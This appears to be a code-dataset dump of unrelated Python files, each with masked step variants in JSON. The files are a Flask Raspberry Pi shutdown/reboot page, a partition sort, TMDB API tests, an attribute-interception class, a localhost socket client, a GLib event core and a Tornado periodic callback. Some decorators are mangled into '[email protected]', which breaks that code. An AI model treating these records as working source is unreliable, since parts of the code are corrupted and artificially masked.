"step-5": "# -*- coding: utf-8 -*-\nfrom flask import Blueprint, render_template, redirect, url_for, flash\nimport subprocess\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\nmod = Blueprint('system', __name__)\n\[email protected]('/')\ndef index():\n uptime = check_output([\"uptime\"])\n return render_template('system/system.html', uptime=uptime)\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\"Shutting down.<br>When the LEDs on the board stop flashing, \\\n it should be safe to unplug your Raspberry Pi.\")\n subprocess.call([\"sudo\", \"halt\"])\n return redirect(url_for('system.index'))\n\[email protected]('/reboot')\ndef reboot():\n flash(\"Rebooting... please wait.<br>This will take approx. one minute.\")\n subprocess.call([\"sudo\", \"reboot\"])\n return redirect(url_for('system.index'))\n",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
import random
#quicksort a list of objects based on keys, which can be any of 3 values
# done in O(n) time in one pass, and O(1) additional space complexity
def quicksort(x, pivot_index):
key1_idx, key2_idx, key3_idx = 0, 0, len(x)
key1_val, key2_val= 'key1', 'key2'
while key2_idx < key3_idx:
if x[key2_idx]['key'] == key1_val:
x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]
key1_idx, key2_idx = key1_idx + 1, key2_idx + 1
elif x[key2_idx]['key'] == key2_val:
key2_idx += 1
else:
key3_idx -= 1
x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]
return x
if __name__ == '__main__':
keys = ['key1', 'key2', 'key3']
values = [0, 1, 2, 3, 4]
key_values = [{'key': key, 'value': value} for key in keys for value in values]
random.shuffle(key_values)
print(quicksort(key_values, 7))
|
normal
|
{
"blob_id": "f193094c551df2a32860948b1a8710b53ca0dfb6",
"index": 2413,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n key_values = [{'key': key, 'value': value} for key in keys for value in\n values]\n random.shuffle(key_values)\n print(quicksort(key_values, 7))\n",
"step-4": "import random\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n key_values = [{'key': key, 'value': value} for key in keys for value in\n values]\n random.shuffle(key_values)\n print(quicksort(key_values, 7))\n",
"step-5": "import random\n\n#quicksort a list of objects based on keys, which can be any of 3 values\n# done in O(n) time in one pass, and O(1) additional space complexity\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val= 'key1', 'key2'\n\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n\n return x\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n\n key_values = [{'key': key, 'value': value} for key in keys for value in values]\n random.shuffle(key_values)\n\n print(quicksort(key_values, 7))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# project/tests/test_tmdb.py
import unittest
import json
from project.server import db
from project.server.models import Tmdb
from project.tests.base import BaseTestCase
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "9e9403ea1c128e07803d080b337003055759c5ae",
"index": 4507,
"step-1": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-5": "# project/tests/test_tmdb.py\n\n\nimport unittest\nimport json\n\nfrom project.server import db\nfrom project.server.models import Tmdb\nfrom project.tests.base import BaseTestCase\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
10
]
}
|
[
4,
5,
6,
7,
10
] |
class CardHolder:
acctlen = 8
retireage = 59.5
def __init__(self, acct, name, age, addr):
self.acct = acct
self.name = name
self.age = age
self.addr = addr
def __getattribute__(self, item): # __getattribute__ intercepts calls for all
# attributes (defined and undefined)
superget = object.__getattribute__ # We have to use __getattribute__ of object
# class (superclass) to prevent looping
if item == 'acct':
return superget(self, 'acct')[:-3] + '***'
elif item == 'remain':
return superget(self, 'retireage') - superget(self, 'age')
else:
return superget(self, item)
def __setattr__(self, key, value):
if key == 'name':
value = value.lower().replace(' ', '_')
elif key == 'age':
if value < 0 or value > 130:
raise ValueError('invalid age')
elif key == 'acct':
value = value.replace('-', '')
if len(value) != self.acctlen:
raise TypeError('invalid acct number')
elif key == 'remain':
raise TypeError('cannot set remain')
self.__dict__[key] = value
if __name__ == '__main__':
bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')
print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')
bob.name = 'Bob Q. Smith'
bob.age = 50
bob.acct = '23-45-67-89'
print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')
sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')
print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')
try:
sue.age = 200
except Exception:
print('Bad age for Sue')
try:
sue.remain = 5
except Exception:
print("Can't set sue.remain")
try:
sue.acct = '1234567'
except Exception:
print('Bad acct for Sue')
|
normal
|
{
"blob_id": "602a7676129721dbfd318407dd972f80d681146c",
"index": 3062,
"step-1": "class CardHolder:\n <mask token>\n <mask token>\n <mask token>\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
"step-2": "class CardHolder:\n <mask token>\n <mask token>\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
"step-3": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
"step-4": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\nif __name__ == '__main__':\n bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n bob.name = 'Bob Q. Smith'\n bob.age = 50\n bob.acct = '23-45-67-89'\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')\n print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')\n try:\n sue.age = 200\n except Exception:\n print('Bad age for Sue')\n try:\n sue.remain = 5\n except Exception:\n print(\"Can't set sue.remain\")\n try:\n sue.acct = '1234567'\n except Exception:\n print('Bad acct for Sue')\n",
"step-5": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item): # __getattribute__ intercepts calls for all\n # attributes (defined and undefined)\n\n superget = object.__getattribute__ # We have to use __getattribute__ of object\n # class (superclass) to prevent looping\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\nif __name__ == '__main__':\n bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n bob.name = 'Bob Q. Smith'\n bob.age = 50\n bob.acct = '23-45-67-89'\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n\n sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')\n print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')\n\n try:\n sue.age = 200\n except Exception:\n print('Bad age for Sue')\n\n try:\n sue.remain = 5\n except Exception:\n print(\"Can't set sue.remain\")\n\n try:\n sue.acct = '1234567'\n except Exception:\n print('Bad acct for Sue')\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import socket
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 8886)
sock.connect(server_address)
data = "TCP"
length = len(data)
ret = bytearray([])
for byte in data.encode("utf-8"):
ret.append(byte)
sock.sendall(ret)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "c6fd848bb3d845a50b928c18a51f296a500e7746",
"index": 2922,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import socket\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import socket\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost', 8886)\n sock.connect(server_address)\n\n data = \"TCP\"\n length = len(data)\n ret = bytearray([])\n for byte in data.encode(\"utf-8\"):\n ret.append(byte)\n sock.sendall(ret)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import time
import errno
from gi.repository import GLib
from ..async import (FutureSourcePair, FutureCanceled, SucceededFuture,
BrokenPipeError, ConnectionError)
__all__ = ('GCore',)
#------------------------------------------------------------------------------#
# GLib Core #
#------------------------------------------------------------------------------#
class GCore (object):
def __init__ (self, context = None):
self.sources = set ()
#--------------------------------------------------------------------------#
# Time #
#--------------------------------------------------------------------------#
def Time (self, resume, cancel = None):
return self.TimeDelay (resume - time.time (), cancel)
def TimeDelay (self, delay, cancel = None):
resume = time.time () + delay
if delay < 0:
return SucceededFuture (resume)
return self.source_create (lambda source: source.TrySetResult (resume),
cancel, GLib.timeout_add, (int (delay * 1000),))
#--------------------------------------------------------------------------#
# Idle #
#--------------------------------------------------------------------------#
def Idle (self, cancel = None):
return self.source_create (lambda source: source.TrySetResult (None), cancel, GLib.idle_add)
#--------------------------------------------------------------------------#
# Poll #
#--------------------------------------------------------------------------#
READ = GLib.IO_IN
WRITE = GLib.IO_OUT
URGENT = GLib.IO_PRI
DISCONNECT = GLib.IO_HUP
ERROR = GLib.IO_ERR | GLib.IO_NVAL | GLib.IO_HUP
def Poll (self, fd, mask, cancel = None):
if mask is None:
return # no clean up for closed file descriptors
def resolve (source, fd, cond):
if cond & ~self.ERROR:
source.TrySetResult (cond)
else:
source.TrySetException (BrokenPipeError (errno.EPIPE, 'Broken pipe')
if cond & self.DISCONNECT else ConnectionError ())
return self.source_create (resolve, cancel, GLib.io_add_watch, (fd, mask | self.ERROR))
#--------------------------------------------------------------------------#
# Execute #
#--------------------------------------------------------------------------#
def __call__ (self): return self.Execute ()
def Execute (self):
try:
for none in self.Iterator ():
if not self.sources:
return
finally:
self.Dispose ()
#--------------------------------------------------------------------------#
# Iterator #
#--------------------------------------------------------------------------#
def __iter__ (self): return self.Iterator ()
def Iterator (self, block = True):
context = GLib.main_context_default ()
while True:
context.iteration (block)
yield
#--------------------------------------------------------------------------#
# Private #
#--------------------------------------------------------------------------#
def source_create (self, resolve, cancel, enqueue, args = None):
"""Create and enqueue future
enqueue (*args, resolve) -> source_id
resolve (source, *resolve_args) -> None
"""
future, source = FutureSourcePair ()
def resolve_internal (*resolve_args):
self.sources.discard (source)
resolve (source, *resolve_args)
return False # remove from event loop
if cancel:
def cancel_cont (result, error):
GLib.source_remove (source_id)
self.sources.discard (source)
source.TrySetCanceled ()
cancel.Await ().OnCompleted (cancel_cont)
source_id = enqueue (*(args + (resolve_internal,))) if args else enqueue (resolve_internal)
self.sources.add (source)
return future
#--------------------------------------------------------------------------#
# Disposable #
#--------------------------------------------------------------------------#
def Dispose (self, error = None):
error = error or FutureCanceled ('Core has been stopped')
# resolve futures
sources, self.sources = self.sources, set ()
for source in list (sources):
source.TrySetException (error)
def __enter__ (self):
return self
def __exit__ (self, et, eo, tb):
self.Dispose (eo)
return False
# vim: nu ft=python columns=120 :
|
normal
|
{
"blob_id": "4d43e470144a6284d85902b495dc19dc150eb681",
"index": 4000,
"step-1": "# -*- coding: utf-8 -*-\nimport time\nimport errno\nfrom gi.repository import GLib\n\nfrom ..async import (FutureSourcePair, FutureCanceled, SucceededFuture,\n BrokenPipeError, ConnectionError)\n\n__all__ = ('GCore',)\n#------------------------------------------------------------------------------#\n# GLib Core #\n#------------------------------------------------------------------------------#\nclass GCore (object):\n def __init__ (self, context = None):\n self.sources = set ()\n\n #--------------------------------------------------------------------------#\n # Time #\n #--------------------------------------------------------------------------#\n def Time (self, resume, cancel = None):\n return self.TimeDelay (resume - time.time (), cancel)\n\n def TimeDelay (self, delay, cancel = None):\n resume = time.time () + delay\n if delay < 0:\n return SucceededFuture (resume)\n\n return self.source_create (lambda source: source.TrySetResult (resume),\n cancel, GLib.timeout_add, (int (delay * 1000),))\n\n #--------------------------------------------------------------------------#\n # Idle #\n #--------------------------------------------------------------------------#\n def Idle (self, cancel = None):\n return self.source_create (lambda source: source.TrySetResult (None), cancel, GLib.idle_add)\n\n #--------------------------------------------------------------------------#\n # Poll #\n #--------------------------------------------------------------------------#\n READ = GLib.IO_IN\n WRITE = GLib.IO_OUT\n URGENT = GLib.IO_PRI\n DISCONNECT = GLib.IO_HUP\n ERROR = GLib.IO_ERR | GLib.IO_NVAL | GLib.IO_HUP\n\n def Poll (self, fd, mask, cancel = None):\n if mask is None:\n return # no clean up for closed file descriptors\n\n def resolve (source, fd, cond):\n if cond & ~self.ERROR:\n source.TrySetResult (cond)\n else:\n source.TrySetException (BrokenPipeError (errno.EPIPE, 'Broken pipe')\n if cond & self.DISCONNECT else ConnectionError ())\n\n return self.source_create (resolve, cancel, GLib.io_add_watch, (fd, mask | self.ERROR))\n\n #--------------------------------------------------------------------------#\n # Execute #\n #--------------------------------------------------------------------------#\n def __call__ (self): return self.Execute ()\n def Execute (self):\n try:\n for none in self.Iterator ():\n if not self.sources:\n return\n finally:\n self.Dispose ()\n\n #--------------------------------------------------------------------------#\n # Iterator #\n #--------------------------------------------------------------------------#\n def __iter__ (self): return self.Iterator ()\n def Iterator (self, block = True):\n context = GLib.main_context_default ()\n while True:\n context.iteration (block)\n yield\n\n #--------------------------------------------------------------------------#\n # Private #\n #--------------------------------------------------------------------------#\n def source_create (self, resolve, cancel, enqueue, args = None):\n \"\"\"Create and enqueue future\n\n enqueue (*args, resolve) -> source_id\n resolve (source, *resolve_args) -> None\n \"\"\"\n future, source = FutureSourcePair ()\n\n def resolve_internal (*resolve_args):\n self.sources.discard (source)\n resolve (source, *resolve_args)\n return False # remove from event loop\n\n if cancel:\n def cancel_cont (result, error):\n GLib.source_remove (source_id)\n self.sources.discard (source)\n source.TrySetCanceled ()\n cancel.Await ().OnCompleted (cancel_cont)\n\n source_id = enqueue (*(args + (resolve_internal,))) if args else enqueue (resolve_internal)\n self.sources.add (source)\n\n return future\n\n #--------------------------------------------------------------------------#\n # Disposable #\n #--------------------------------------------------------------------------#\n def Dispose (self, error = None):\n error = error or FutureCanceled ('Core has been stopped')\n\n # resolve futures\n sources, self.sources = self.sources, set ()\n for source in list (sources):\n source.TrySetException (error)\n\n def __enter__ (self):\n return self\n\n def __exit__ (self, et, eo, tb):\n self.Dispose (eo)\n return False\n\n# vim: nu ft=python columns=120 :\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""Class for better periodic call handling"""
import tornado
import tornado.gen
import logging
class YieldPeriodicCallback(object):
"""Class for better periodic call"""
def __init__(self, callback, callback_time, io_loop=None, faststart=False):
"""Init method it can be used like tornado periodic callback, but it has
extra paramtetr
:param faststart: if true callback will be run after application start
"""
self.callback = callback
if callback_time <= 0:
raise ValueError("Periodic callback must have a positive callback_time")
self.callback_time = callback_time
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
self._running = False
self._timeout = None
if faststart:
self._running = True
self._next_timeout = self.io_loop.time()
self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
def start(self):
"""Starts the timer"""
if self._running:
return
self._running = True
self._next_timeout = self.io_loop.time()
self._schedule_next()
def stop(self):
"""Stops the timer"""
self._running = False
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
@tornado.gen.coroutine
def _run(self):
"""Run the run method and schedule next time"""
if not self._running:
return
try:
yield self.callback()
except Exception: # pylint: disable=W0703
logging.error("Error in periodic callback", exc_info=True)
self._schedule_next()
def _schedule_next(self):
"""Schedule next callback method"""
if self._running:
current_time = self.io_loop.time()
while self._next_timeout <= current_time:
self._next_timeout += self.callback_time / 1000.0
self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
|
normal
|
{
"blob_id": "7726f8cc9adf15823cccdaa4ba316800bb134460",
"index": 1920,
